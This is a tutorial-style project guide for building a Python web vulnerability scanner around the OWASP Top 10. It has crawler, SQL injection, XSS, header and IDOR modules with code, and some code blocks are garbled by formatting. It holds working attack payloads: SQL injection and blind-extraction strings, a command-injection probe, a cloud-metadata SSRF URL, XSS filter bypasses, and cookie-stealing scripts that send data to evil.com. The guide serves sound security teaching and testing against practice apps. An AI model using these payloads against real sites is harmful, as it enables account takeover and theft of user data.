Project 2: Web Application Vulnerability Scanner
Project 2: Web Application Vulnerability Scanner
Project Overview
| Attribute | Value |
|---|---|
| Difficulty | Intermediate |
| Time Estimate | 2-3 weeks |
| Programming Language | Python |
| Primary Framework | OWASP Top 10 |
| Main Book | โBug Bounty Bootcampโ by Vickie Li |
| Knowledge Area | Web Security |
Learning Objectives
By completing this project, you will:
- Master the OWASP Top 10 - Understand each vulnerability class deeply enough to detect and exploit them
- Understand HTTP at the protocol level - Request/response headers, cookies, sessions, and state management
- Build automated security testing - Design scanners that find real vulnerabilities
- Learn attack surface discovery - Crawl applications to identify all input points
- Develop responsible disclosure skills - Report findings professionally with evidence
The Core Question
โHow do web application scanners automatically find vulnerabilities that developers miss?โ
Web applications are the #1 attack surface in modern organizations. Building your own scanner teaches you:
- Why certain coding patterns create vulnerabilities
- How injection attacks actually work at the request/response level
- What makes false positives vs true positives
- The difference between automated scanning and skilled testing
Deep Theoretical Foundation
The HTTP Protocol: Your Attack Surface
Every web vulnerability exploitation involves HTTP requests and responses. You must understand this protocol intimately:
HTTP REQUEST ANATOMY
โโโโโโโโโโโโโโโโโโโโ
POST /login HTTP/1.1 โโโ Request Line
Host: vulnerable-app.com โโโ Headers begin
User-Agent: Mozilla/5.0 (Windows NT 10.0)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Cookie: session=abc123; tracking=xyz789 โโโ Cookies (session state)
Connection: close
โโโ Blank line separates headers/body
username=admin&password=secret123 โโโ Request Body (POST data)
HTTP RESPONSE ANATOMY
โโโโโโโโโโโโโโโโโโโโโ
HTTP/1.1 200 OK โโโ Status Line
Date: Mon, 27 Dec 2025 12:00:00 GMT
Server: Apache/2.4.41 (Ubuntu) โโโ Information disclosure!
X-Powered-By: PHP/7.4.3 โโโ More info disclosure!
Set-Cookie: session=def456; HttpOnly; Secure โโโ New session cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
โโโ Blank line
<!DOCTYPE html> โโโ Response Body
<html>
<head><title>Welcome Admin</title></head> โโโ May reveal successful login
<body>...
Where Vulnerabilities Live
Web applications have multiple layers, each with unique attack surfaces:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WEB APPLICATION STACK โ
โ (Attack Surface at Every Layer) โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
CLIENT SIDE (Browser)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โ
โ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โ
โ โ JavaScript โ โ Local Storage โ โ Cookies โ โ
โ โ โ โ โ โ โ โ
โ โ โ XSS attacks โ โ โ Sensitive โ โ โ Session โ โ
โ โ execute here โ โ data exposure โ โ hijacking โ โ
โ โ โ DOM โ โ โ No HttpOnly โ โ โ CSRF tokens โ โ
โ โ manipulation โ โ protection โ โ โ Missing โ โ
โ โ โ โ โ โ Secure flag โ โ
โ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โ HTTP Request
โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WEB SERVER (nginx, Apache, IIS) โ
โ โ
โ โ Security headers (CSP, X-Frame-Options) โ
โ โ TLS configuration (HTTPS) โ
โ โ Directory listings โ
โ โ Server version disclosure โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ APPLICATION LAYER (PHP, Python, Node.js, Java) โ
โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ INPUT HANDLING โ โ
โ โ โ โ
โ โ URL Parameters: /page?id=1 โ SQL Injection โ โ
โ โ POST Data: username=admin โ Auth Bypass โ โ
โ โ Headers: User-Agent: ... โ Log Injection โ โ
โ โ Cookies: role=user โ Privilege Escalation โ โ
โ โ File Uploads: image.php.jpg โ Remote Code Execution โ โ
โ โ JSON/XML: {"user":"..."} โ XXE, Deserialization โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ BUSINESS LOGIC โ โ
โ โ โ โ
โ โ โ IDOR (Insecure Direct Object Reference) โ โ
โ โ GET /api/users/123 โ Change to /api/users/124 โ โ
โ โ โ โ
โ โ โ Authorization flaws โ โ
โ โ User can access admin functions โ โ
โ โ โ โ
โ โ โ Race conditions โ โ
โ โ Submit payment twice quickly โ โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ DATABASE LAYER โ
โ โ
โ โ SQL Injection (SELECT * FROM users WHERE id='$input') โ
โ โ NoSQL Injection (MongoDB query operators) โ
โ โ Stored XSS (malicious data in database) โ
โ โ Credential exposure (passwords in plaintext) โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

OWASP Top 10 2025: What Your Scanner Must Find
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ OWASP TOP 10 2025 VULNERABILITY CLASSES โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[A01] BROKEN ACCESS CONTROL
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Users can access resources they shouldn't
How to test:
1. Change ?user_id=123 to ?user_id=124
2. Access /admin without admin role
3. Modify hidden form fields (role=admin)
4. Bypass authentication via direct URL
Scanner Detection:
โโโ Test IDOR by incrementing/decrementing IDs
โโโ Access restricted paths without authentication
โโโ Modify request parameters and observe response changes
[A02] CRYPTOGRAPHIC FAILURES
โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Sensitive data exposed due to weak/missing encryption
How to test:
1. Check for HTTP (not HTTPS)
2. Analyze password storage (MD5, plaintext visible)
3. Look for sensitive data in responses
Scanner Detection:
โโโ Flag any non-HTTPS login pages
โโโ Check for password/credit card in response bodies
โโโ Analyze Set-Cookie for missing Secure flag
[A03] INJECTION (SQL, Command, LDAP)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Untrusted data sent to interpreter as part of command
How to test:
1. Add ' to inputs, look for SQL errors
2. Try SQL payloads: ' OR '1'='1
3. Test for command injection: ; ls -la
4. LDAP injection: )(uid=*)
Scanner Detection:
โโโ Inject ' and " in all parameters
โโโ Analyze error messages for SQL syntax errors
โโโ Use time-based payloads: ' AND SLEEP(5)--
โโโ Look for command output in responses
[A04] INSECURE DESIGN
โโโโโโโโโโโโโโโโโโโโโ
What: Missing security controls, flawed architecture
How to test:
1. Check for rate limiting (brute force possible?)
2. Review password reset flow
3. Look for missing CAPTCHA
Scanner Detection:
โโโ Send 100 requests rapidly, check for rate limiting
โโโ Test password reset token predictability
โโโ Note: Many design flaws need manual review
[A05] SECURITY MISCONFIGURATION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Insecure default configs, unnecessary features
How to test:
1. Check for default credentials
2. Look for exposed admin interfaces
3. Directory listing enabled?
4. Stack traces in errors?
Scanner Detection:
โโโ Access /admin, /phpmyadmin, /wp-admin
โโโ Trigger errors, check for verbose messages
โโโ Test for directory listing: /images/
โโโ Check common default credentials
[A06] VULNERABLE COMPONENTS
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Using libraries with known CVEs
How to test:
1. Identify framework/library versions
2. Check against CVE databases
3. Look for outdated JavaScript libraries
Scanner Detection:
โโโ Parse Server header for versions
โโโ Check JavaScript libraries against retire.js
โโโ Identify framework from response patterns
[A07] AUTHENTICATION FAILURES
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Broken login, session management
How to test:
1. Brute force with common passwords
2. Session fixation attacks
3. Session timeout (do sessions expire?)
Scanner Detection:
โโโ Try admin:admin, admin:password
โโโ Check if session ID changes after login
โโโ Look for session ID in URL (bad practice)
โโโ Test remember-me token security
[A08] DATA INTEGRITY FAILURES
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Software updates without verification
How to test:
1. Check for unsigned updates
2. Look for insecure deserialization
Scanner Detection:
โโโ Limited automated testing
โโโ Flag if application loads external resources
[A09] LOGGING/MONITORING FAILURES
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Attacks go undetected
How to test:
1. Trigger suspicious activity
2. Check if you're blocked after failed logins
Scanner Detection:
โโโ Multiple failed logins - are you blocked?
โโโ Note: Primarily manual review
[A10] SSRF (Server-Side Request Forgery)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
What: Server makes requests to attacker-controlled destinations
How to test:
1. Find URL input parameters
2. Try ?url=http://169.254.169.254 (AWS metadata)
3. Try ?url=http://localhost:8080
Scanner Detection:
โโโ Inject URLs pointing to known callback server
โโโ Try cloud metadata URLs
โโโ Test for internal port scanning via SSRF
SQL Injection Deep Dive
SQL injection remains prevalent because itโs easy to make and hard to detect automatically:
NORMAL LOGIN QUERY
โโโโโโโโโโโโโโโโโโ
User Input:
username: alice
password: secret123
Application Code (VULNERABLE):
query = "SELECT * FROM users WHERE username='" + username +
"' AND password='" + password + "'"
Resulting Query:
SELECT * FROM users WHERE username='alice' AND password='secret123'
Result: Only returns Alice's record if password matches
SQL INJECTION ATTACK
โโโโโโโโโโโโโโโโโโโโ
User Input:
username: admin' --
password: anything
Resulting Query:
SELECT * FROM users WHERE username='admin' --' AND password='anything'
โ
This is a SQL comment!
Everything after is ignored
Actual Query Executed:
SELECT * FROM users WHERE username='admin'
Result: Returns admin account WITHOUT password check!
UNION-BASED DATA EXTRACTION
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
URL: /products?id=5
Normal Query:
SELECT name, price, description FROM products WHERE id=5
Attack URL: /products?id=5 UNION SELECT username,password,email FROM users--
Resulting Query:
SELECT name, price, description FROM products WHERE id=5
UNION
SELECT username, password, email FROM users--
Result: Page displays ALL usernames, passwords, and emails!
TIME-BASED BLIND SQL INJECTION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
When no visible output exists, measure response time:
Attack: /products?id=5' AND SLEEP(5)--
If the page takes 5+ seconds to load:
โ SQL injection confirmed!
โ Database is processing the SLEEP() command
Extracting data character by character:
/products?id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
If response takes 5 seconds โ First char of database name is 'a'
If response is instant โ First char is NOT 'a', try 'b', 'c', etc.
Cross-Site Scripting (XSS) Explained
XSS ATTACK TYPES
โโโโโโโโโโโโโโโโ
REFLECTED XSS (Non-Persistent)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Attack URL sent to victim via phishing:
https://vulnerable.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
Server reflects input in response:
<h1>Search results for: <script>document.location='...'</script></h1>
Browser executes the script โ Cookies stolen!
STORED XSS (Persistent)
โโโโโโโโโโโโโโโโโโโโโโโ
Attacker posts comment:
Great product! <script>document.location='https://evil.com/steal?c='+document.cookie</script>
Comment saved in database, displayed to ALL users who view page
Every visitor's cookies are stolen automatically
DOM-BASED XSS
โโโโโโโโโโโโโ
Vulnerable JavaScript:
document.getElementById('output').innerHTML = location.hash.substring(1);
Attack URL:
https://vulnerable.com/page#<img src=x onerror=alert(document.cookie)>
Script never goes to server - executes entirely client-side
XSS PAYLOADS FOR TESTING
โโโโโโโโโโโโโโโโโโโโโโโโโโโ
Basic:
<script>alert('XSS')</script>
Event handlers:
<img src=x onerror=alert('XSS')>
<body onload=alert('XSS')>
<svg onload=alert('XSS')>
Filter bypasses:
<ScRiPt>alert('XSS')</ScRiPt> # Case variation
<script>alert(String.fromCharCode(88,83,83))</script> # Char codes
<img src=x onerror="alert('XSS')"> # HTML entities
<script>eval(atob('YWxlcnQoJ1hTUycp'))</script> # Base64
Context-aware:
In attribute: " onmouseover="alert('XSS')
In JavaScript: ';alert('XSS');//
In URL: javascript:alert('XSS')
Project Specification
What Youโre Building
A modular web vulnerability scanner with the following structure:
web-vuln-scanner/
โโโ scanner.py # Main scanner orchestrator
โโโ crawler.py # Web crawler for attack surface discovery
โโโ modules/
โ โโโ __init__.py
โ โโโ sqli.py # SQL injection tests
โ โโโ xss.py # XSS tests
โ โโโ idor.py # IDOR/access control tests
โ โโโ ssrf.py # SSRF tests
โ โโโ headers.py # Security headers analysis
โ โโโ disclosure.py # Information disclosure tests
โโโ payloads/
โ โโโ sqli.txt # SQL injection payloads
โ โโโ xss.txt # XSS payloads
โ โโโ wordlists/ # Directory brute-force lists
โโโ reports/
โ โโโ templates/
โ โโโ report.html # HTML report template
โโโ requirements.txt
โโโ README.md
Functional Requirements
1. Web Crawler (crawler.py)
Must implement:
- Start from seed URL, discover all pages
- Extract forms (action URL, method, input fields)
- Extract links (href, src)
- Respect robots.txt (optional override)
- Handle relative and absolute URLs
- Track visited URLs to avoid loops
Should implement:
- JavaScript rendering (Selenium/Playwright)
- API endpoint discovery
- Handle authentication (cookie jar)
- Rate limiting
Output: List of pages with their forms and parameters
2. SQL Injection Scanner (modules/sqli.py)
Must implement:
- Error-based detection (look for SQL errors in response)
- Boolean-based detection (compare true/false responses)
- Time-based detection (measure response delays)
- Test all parameter types (GET, POST, cookies)
Should implement:
- UNION-based exploitation
- Identify database type (MySQL, PostgreSQL, MSSQL)
- Extract table names
- Payload encoding for WAF bypass
3. XSS Scanner (modules/xss.py)
Must implement:
- Reflected XSS detection
- Multiple context detection (HTML, attribute, JavaScript)
- Basic filter bypass payloads
Should implement:
- Stored XSS detection (check if payload persists)
- DOM-based XSS detection
- Custom payload generation based on context
4. IDOR Scanner (modules/idor.py)
Must implement:
- Detect numeric ID parameters
- Test ID manipulation (increment/decrement)
- Compare responses for different IDs
Should implement:
- UUID/GUID manipulation
- Test with different user sessions
5. Security Headers Analyzer (modules/headers.py)
Must check for:
- Content-Security-Policy
- X-Content-Type-Options
- X-Frame-Options
- Strict-Transport-Security
- X-XSS-Protection
- Server/X-Powered-By disclosure
6. Report Generator
Must implement:
- JSON output for tool integration
- HTML report with findings, evidence, recommendations
- Severity ratings (Critical, High, Medium, Low)
- Screenshots/evidence storage
Solution Architecture
Component Design
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ WEB VULNERABILITY SCANNER โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ
โผ
โโโโโโโโโโโโโโโโโโโโโ
โ Orchestrator โ
โ (scanner.py) โ
โโโโโโโโโโโโโโโโโโโโโค
โ - Load config โ
โ - Initialize โ
โ - Coordinate โ
โ - Generate report โ
โโโโโโโโโโโฌโโโโโโโโโโ
โ
โโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโ
โ โ โ
โผ โผ โผ
โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ
โ Crawler โ โ Modules โ โ Reporter โ
โโโโโโโโโโโโโโโโโค โโโโโโโโโโโโโโโโโค โโโโโโโโโโโโโโโโโค
โ - Discover โ โ - SQLi โ โ - Format โ
โ pages โโโโโบโ - XSS โโโโโบโ findings โ
โ - Extract โ โ - IDOR โ โ - Generate โ
โ forms โ โ - Headers โ โ HTML/JSON โ
โ - Map attack โ โ - SSRF โ โ - Severity โ
โ surface โ โ โ โ rating โ
โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ
Key Data Structures
@dataclass
class CrawlResult:
url: str
method: str # GET, POST
parameters: List[Parameter]
forms: List[Form]
response_code: int
@dataclass
class Parameter:
name: str
value: str
location: str # query, body, cookie, header
param_type: str # string, numeric, email, etc.
@dataclass
class Form:
action: str
method: str
inputs: List[FormInput]
@dataclass
class FormInput:
name: str
input_type: str # text, password, hidden, etc.
value: Optional[str]
@dataclass
class Vulnerability:
vuln_type: str # sqli, xss, idor, etc.
severity: str # critical, high, medium, low
url: str
parameter: str
payload: str
evidence: str
reproduction_steps: List[str]
recommendation: str
Testing Flow
SCANNER WORKFLOW
โโโโโโโโโโโโโโโโ
1. CRAWLING PHASE
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Start URL: https://target.com โ
โ โ
โ โ Visit page โ
โ โ Extract links: /login, /products, /about โ
โ โ Extract forms: login form, search form โ
โ โ Queue new URLs for crawling โ
โ โ Repeat until all URLs visited โ
โ โ
โ Result: Attack surface map โ
โ - 50 unique pages โ
โ - 12 forms โ
โ - 85 parameters โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
2. TESTING PHASE
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ For each parameter in attack surface: โ
โ โ
โ SQLi Module: โ
โ - Inject ' and " โ Check for SQL errors โ
โ - Try boolean payloads โ Compare responses โ
โ - Try time-based โ Measure delays โ
โ โ
โ XSS Module: โ
โ - Inject <script>alert(1)</script> โ
โ - Check if payload appears in response โ
โ - Test multiple contexts โ
โ โ
โ IDOR Module: โ
โ - If numeric ID found, try adjacent values โ
โ - Compare response content โ
โ โ
โ ...repeat for each module... โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
3. REPORTING PHASE
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Aggregate all findings: โ
โ - Critical: 2 SQLi vulnerabilities โ
โ - High: 5 XSS vulnerabilities โ
โ - Medium: 3 IDOR issues โ
โ - Low: 8 missing security headers โ
โ โ
โ Generate report with: โ
โ - Executive summary โ
โ - Technical details for each finding โ
โ - Reproduction steps โ
โ - Recommendations โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

Phased Implementation Guide
Phase 1: HTTP Client and Crawler Foundation (Days 1-3)
Goal: Crawl a simple website and extract all forms
Implementation steps:
- Create HTTP session wrapper: ```python import requests from urllib.parse import urljoin, urlparse
class WebSession: def init(self, base_url: str, timeout: int = 10): self.session = requests.Session() self.base_url = base_url self.timeout = timeout self.visited = set()
def get(self, url: str) -> requests.Response:
full_url = urljoin(self.base_url, url)
return self.session.get(full_url, timeout=self.timeout)
def post(self, url: str, data: dict) -> requests.Response:
full_url = urljoin(self.base_url, url)
return self.session.post(full_url, data=data, timeout=self.timeout) ```
- Implement HTML parser for links and forms: ```python from bs4 import BeautifulSoup
def extract_links(html: str, base_url: str) -> List[str]: soup = BeautifulSoup(html, โhtml.parserโ) links = [] for a in soup.find_all(โaโ, href=True): link = urljoin(base_url, a[โhrefโ]) if urlparse(link).netloc == urlparse(base_url).netloc: links.append(link) return links
def extract_forms(html: str, base_url: str) -> List[Form]: soup = BeautifulSoup(html, โhtml.parserโ) forms = [] for form in soup.find_all(โformโ): action = urljoin(base_url, form.get(โactionโ, โโ)) method = form.get(โmethodโ, โgetโ).upper() inputs = [] for inp in form.find_all([โinputโ, โtextareaโ, โselectโ]): inputs.append(FormInput( name=inp.get(โnameโ, โโ), input_type=inp.get(โtypeโ, โtextโ), value=inp.get(โvalueโ, โโ) )) forms.append(Form(action, method, inputs)) return forms
3. Implement BFS crawler:
```python
from collections import deque
def crawl(start_url: str, max_pages: int = 100) -> List[CrawlResult]:
session = WebSession(start_url)
queue = deque([start_url])
results = []
while queue and len(results) < max_pages:
url = queue.popleft()
if url in session.visited:
continue
session.visited.add(url)
try:
response = session.get(url)
links = extract_links(response.text, url)
forms = extract_forms(response.text, url)
params = extract_url_params(url)
results.append(CrawlResult(url, 'GET', params, forms, response.status_code))
for link in links:
if link not in session.visited:
queue.append(link)
except Exception as e:
print(f"Error crawling {url}: {e}")
return results
Verification: Crawl DVWA or OWASP WebGoat and list all discovered forms
Phase 2: SQL Injection Module (Days 3-6)
Goal: Detect SQL injection in any parameter
Implementation steps:
- Create payload injection framework:
def inject_parameter(session: WebSession, url: str, param: str, payload: str, method: str = 'GET') -> requests.Response: """Inject payload into specific parameter""" if method == 'GET': # Modify URL query string parsed = urlparse(url) params = dict(parse_qs(parsed.query)) params[param] = [payload] new_query = urlencode(params, doseq=True) new_url = parsed._replace(query=new_query).geturl() return session.get(new_url) else: # Modify POST body return session.post(url, data={param: payload}) - Implement error-based detection: ```python SQL_ERRORS = [ โyou have an error in your sql syntaxโ, โwarning: mysqlโ, โunclosed quotation markโ, โquoted string not properly terminatedโ, โsqlexceptionโ, โmicrosoft ole db provider for sql serverโ, โpostgresql query failedโ, โsyntax error at or nearโ, ]
def test_sqli_error_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]: payloads = [โโโ, โโโ, โโ OR โ1โ=โ1โ, โ1โ AND โ1โ=โ1โ]
for payload in payloads:
response = inject_parameter(session, url, param, payload)
for error in SQL_ERRORS:
if error.lower() in response.text.lower():
return Vulnerability(
vuln_type="SQL Injection (Error-based)",
severity="critical",
url=url,
parameter=param,
payload=payload,
evidence=f"SQL error found: {error}",
reproduction_steps=[
f"1. Navigate to {url}",
f"2. Set parameter {param} to: {payload}",
f"3. Observe SQL error in response"
],
recommendation="Use parameterized queries/prepared statements"
)
return None ```
- Implement time-based detection: ```python import time
def test_sqli_time_based(session: WebSession, url: str, param: str) -> Optional[Vulnerability]: delay = 5 # seconds payloads = [ fโโ AND SLEEP({delay})โโ, fโโ; WAITFOR DELAY โ0:0:{delay}โโโ, fโโ AND pg_sleep({delay})โโ ]
# First, get baseline response time
start = time.time()
session.get(url)
baseline = time.time() - start
for payload in payloads:
start = time.time()
inject_parameter(session, url, param, payload)
elapsed = time.time() - start
if elapsed >= baseline + delay - 0.5: # Allow 0.5s tolerance
return Vulnerability(
vuln_type="SQL Injection (Time-based Blind)",
severity="critical",
url=url,
parameter=param,
payload=payload,
evidence=f"Response delayed by {elapsed:.1f}s (expected {delay}s)",
reproduction_steps=[...],
recommendation="Use parameterized queries/prepared statements"
)
return None ```
Verification: Detect SQLi in DVWA with security level โlowโ
Phase 3: XSS Module (Days 6-9)
Goal: Detect reflected XSS vulnerabilities
Implementation steps:
- Create XSS payload generator: ```python XSS_PAYLOADS = [ โโ, โ<img src=x onerror=alert(1)>โ, โโ>โ, โโ-alert(1)-โโ, โ<svg onload=alert(1)>โ, ]
Random marker to detect reflection
def generate_xss_marker(): return fโxss{random.randint(10000, 99999)}โ
2. Implement reflection detection:
```python
def test_xss_reflected(session: WebSession, url: str, param: str) -> List[Vulnerability]:
vulnerabilities = []
for payload in XSS_PAYLOADS:
response = inject_parameter(session, url, param, payload)
# Check if payload is reflected unencoded
if payload in response.text:
# Determine context
context = determine_xss_context(response.text, payload)
vulnerabilities.append(Vulnerability(
vuln_type=f"Reflected XSS ({context})",
severity="high",
url=url,
parameter=param,
payload=payload,
evidence=f"Payload reflected in {context} context",
reproduction_steps=[
f"1. Navigate to {url}",
f"2. Set parameter {param} to: {payload}",
f"3. Observe JavaScript execution"
],
recommendation="Encode output based on context (HTML, JS, URL)"
))
break # Found XSS, no need to test more payloads
return vulnerabilities
def determine_xss_context(html: str, payload: str) -> str:
"""Determine where payload landed in HTML"""
soup = BeautifulSoup(html, 'html.parser')
# Check if in script tag
for script in soup.find_all('script'):
if payload in script.text:
return "JavaScript"
# Check if in attribute
for tag in soup.find_all():
for attr, value in tag.attrs.items():
if isinstance(value, str) and payload in value:
return f"Attribute ({attr})"
return "HTML body"
- Add filter bypass payloads:
XSS_BYPASS_PAYLOADS = [ # Case variation '<ScRiPt>alert(1)</ScRiPt>', # Event handlers '<img src=x onerror=alert(1)>', '<body onload=alert(1)>', # Unicode encoding '<script>alert\u0028\u0031\u0029</script>', # Double encoding '%253Cscript%253Ealert(1)%253C/script%253E', ]
Verification: Detect XSS in DVWA and OWASP WebGoat
Phase 4: Security Headers and Misconfig Detection (Days 9-11)
Goal: Check for missing security headers and misconfigurations
Implementation steps:
- Security headers analyzer: ```python SECURITY_HEADERS = { โStrict-Transport-Securityโ: { โseverityโ: โmediumโ, โrecommendationโ: โAdd HSTS header: Strict-Transport-Security: max-age=31536000; includeSubDomainsโ }, โContent-Security-Policyโ: { โseverityโ: โmediumโ, โrecommendationโ: โImplement Content Security Policy to prevent XSSโ }, โX-Content-Type-Optionsโ: { โseverityโ: โlowโ, โrecommendationโ: โAdd X-Content-Type-Options: nosniffโ }, โX-Frame-Optionsโ: { โseverityโ: โmediumโ, โrecommendationโ: โAdd X-Frame-Options: DENY or SAMEORIGINโ }, โX-XSS-Protectionโ: { โseverityโ: โlowโ, โrecommendationโ: โAdd X-XSS-Protection: 1; mode=blockโ } }
def check_security_headers(response: requests.Response) -> List[Vulnerability]: vulnerabilities = []
for header, info in SECURITY_HEADERS.items():
if header not in response.headers:
vulnerabilities.append(Vulnerability(
vuln_type=f"Missing Security Header: {header}",
severity=info['severity'],
url=response.url,
parameter="N/A",
payload="N/A",
evidence=f"Header {header} not present in response",
reproduction_steps=[
f"1. Request {response.url}",
f"2. Inspect response headers",
f"3. Note absence of {header}"
],
recommendation=info['recommendation']
))
# Check for information disclosure
for header in ['Server', 'X-Powered-By', 'X-AspNet-Version']:
if header in response.headers:
vulnerabilities.append(Vulnerability(
vuln_type=f"Information Disclosure: {header}",
severity='low',
url=response.url,
parameter="N/A",
payload="N/A",
evidence=f"{header}: {response.headers[header]}",
reproduction_steps=[...],
recommendation=f"Remove or genericize {header} header"
))
return vulnerabilities ```
- Directory listing detection:
def check_directory_listing(session: WebSession, base_url: str) -> List[Vulnerability]: common_dirs = ['/images/', '/uploads/', '/static/', '/assets/', '/css/', '/js/'] vulnerabilities = [] for directory in common_dirs: url = urljoin(base_url, directory) response = session.get(url) if response.status_code == 200: if 'Index of' in response.text or 'Directory listing' in response.text: vulnerabilities.append(Vulnerability( vuln_type="Directory Listing Enabled", severity="low", url=url, parameter="N/A", payload="N/A", evidence="Directory contents visible", reproduction_steps=[f"Navigate to {url}"], recommendation="Disable directory listing in web server config" )) return vulnerabilities
Phase 5: IDOR and Access Control (Days 11-13)
Goal: Detect insecure direct object references
Implementation steps:
- Identify numeric parameters:
def find_numeric_params(crawl_results: List[CrawlResult]) -> List[tuple]: """Find all numeric ID parameters""" id_params = [] for result in crawl_results: for param in result.parameters: # Check if value is numeric if param.value.isdigit(): id_params.append((result.url, param.name, param.value)) return id_params -
Test for IDOR: ```python def test_idor(session: WebSession, url: str, param: str, original_id: str) -> Optional[Vulnerability]: โ"โTest if changing ID returns different userโs dataโโโ
# Get original response original_response = session.get(url)
# Try adjacent IDs test_ids = [ str(int(original_id) + 1), str(int(original_id) - 1), str(int(original_id) * 2), ]
for test_id in test_ids: modified_url = url.replace(fโ{param}={original_id}โ, fโ{param}={test_id}โ) test_response = session.get(modified_url)
# If we get a 200 with different content, potential IDOR if test_response.status_code == 200: if test_response.text != original_response.text: # Further analysis: does it contain PII-like data? if contains_pii_indicators(test_response.text): return Vulnerability( vuln_type="Insecure Direct Object Reference (IDOR)", severity="high", url=url, parameter=param, payload=f"Changed {original_id} to {test_id}", evidence="Different data returned for modified ID", reproduction_steps=[ f"1. Request original: {url}", f"2. Modify {param} from {original_id} to {test_id}", f"3. Observe different user data returned" ], recommendation="Implement proper authorization checks" ) return None
def contains_pii_indicators(text: str) -> bool: โ"โCheck if response might contain personal dataโโโ indicators = [โemailโ, โphoneโ, โaddressโ, โssnโ, โpasswordโ, โcreditโ, โaccountโ] return any(ind in text.lower() for ind in indicators)
### Phase 6: Reporting and Integration (Days 13-14)
**Goal**: Generate professional vulnerability reports
**Implementation steps**:
1. Report generator:
```python
from jinja2 import Template
def generate_html_report(vulnerabilities: List[Vulnerability], target: str) -> str:
template = Template('''
<!DOCTYPE html>
<html>
<head>
<title>Vulnerability Scan Report - {{ target }}</title>
<style>
.critical { background-color: #ff4444; color: white; }
.high { background-color: #ff8800; color: white; }
